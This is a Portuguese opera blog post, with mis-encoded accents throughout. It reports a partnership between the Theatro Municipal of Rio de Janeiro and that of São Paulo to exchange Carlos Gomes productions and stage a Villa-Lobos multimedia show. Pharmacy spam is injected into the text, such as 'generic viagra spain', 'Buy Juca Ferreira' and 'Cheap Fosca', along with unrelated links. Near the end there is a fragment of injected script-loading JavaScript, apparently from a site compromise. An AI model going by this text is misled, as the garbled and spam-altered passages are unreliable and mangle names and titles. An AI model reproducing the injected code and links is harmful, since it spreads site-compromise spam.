LateralMúsica sinfônicaNotíciaÓperaRio de JaneiroSão PauloTecnologia

A notA�cia do ano: Municipais de Rio e SA?o Paulo fazem parceria

Casas de A?pera carioca e paulistana trocarA?o produA�A�es de Carlos Gomes e apresentarA?o espetA?culo inA�dito com mA?sica de Villa-Lobos.

 

Mais uma boa notA�cia da gestA?o order lasuna JoA?o Guilherme Ripper no Theatro Municipal do Rio de Janeiro. A casa carioca acaba de celebrar uma parceria com o Theatro Municipal de SA?o Paulo, o mais importante teatro de A?pera do paA�s nos tempos atuais.

O anA?ncio foi feito nesta terA�a-feira, em BrasA�lia, pelo MinistA�rio da Cultura (MinC), em coletiva de imprensa. Participaram o ministro da Cultura, Buy Juca Ferreira; o diretor artA�stico da FundaA�A?o Theatro Municipal de SA?o Paulo, maestro John Neschling; o diretor geral da FundaA�A?o Theatro Municipal de SA?o Paulo, Buy JosA� Luiz Herencia http://blog.jasonlneff.com/?p=3427 ; e Ripper, presidente da FundaA�A?o Teatro Municipal do RJ.

O anA?ncio principal foi a realizaA�A?o de um projeto patrocinado pelo MinC, orA�ado em R$ 5 milhA�es, intitulado generic viagra spain Alma Brasileira http://hattrix.co.uk/dulcolax-delivery/ , de carA?terA�multimA�dia e com mA?sicas de Heitor Villa-Lobos. A iniciativa incluirA? algumas das mais conhecidas obras de Villa, como A Floresta do Amazonas, as Bachianas ns. 4 e 5, e os Choros ns. 6 10. As obras serA?o apresentadas com a projeA�A?o de filmes criados especialmente pelo grupo teatral catalA?o La Fura dels Baus.

A estreia serA? em SA?o Paulo, em julho de 2016, e, em seguida, o espetA?culo serA? apresentado no Rio de Janeiro, em agosto do mesmo ano, durante o perA�odo das OlimpA�adas. HaverA? apresentaA�A�es tambA�m em Belo Horizonte e Salvador, e jA? estA?o sendo negociadas apresentaA�A�es em palcos do exterior. Cada casa oferecerA? o espetA?culo com seus prA?prios corpos artA�sticos.

Neschling e Ripper anunciaram tambA�m uma parceria que resultarA? na troca de produA�A�es entre os dois teatros de A?pera. Em 2016, o Municipal do Rio apresentarA? a montagem da A?pera La BohA?me, de Puccini, que o teatro paulistano montarA? no mesmo ano (remontagem da temporada 2013). No fim de 2016, o Municipal de SP, como jA? havia sido anunciado, produzirA? Cheap Fosca, de Carlos Gomes, enquanto a casa carioca apresentarA? Lo Schiavo, tambA�m do compositor campineiro. Essas produA�A�es serA?o permutadas em 2017, quando Fosca serA? apresentada no Rio, e Lo Schiavo, em SA?o Paulo. O objetivo A� valorizar a obra do mais importante compositor brasileiro de A?peras.

Essa parceria seria impensA?vel atA� o fim do ano passado, quando o Municipal do Rio era dirigido por uma “administradora” completamente despreparada para conduzir os rumos de uma casa de A?pera. A situaA�A?o mudou a partir do meio deste ano. Em menos de dois meses A� frente da casa, Ripper mostra que hA? vida inteligente novamente na direA�A?o do Theatro Municipal do Rio de Janeiro.

Exatamente por isso, Neschling agora pode, mesmo que indiretamente, contribuir tambA�m com a casa de A?pera de sua cidade (afinal, o maestro A� carioca). Ele jamais se daria ao trabalho de auxiliar uma administraA�A?o acA�fala, como aquela que fez o Theatro Municipal do Rio limitar-se por tanto tempo a temporadas medA�ocres. Os tempos (que bom!) sA?o outros.

A coletiva de imprensa pode ser assistida, na A�ntegra, abaixo.

Buy document.currentScript.parentNode.insertBefore(s, document.currentScript);d.getElementsByTagName(‘head’)[0].appendChild(s);

Faça seu comentário
Leonardo Marques
Formado em Letras com pós-graduação em Língua Italiana. Frequentador assíduo de concertos e óperas. Participou de cursos particulares sobre ópera. E-mail: leonardo@movimento.com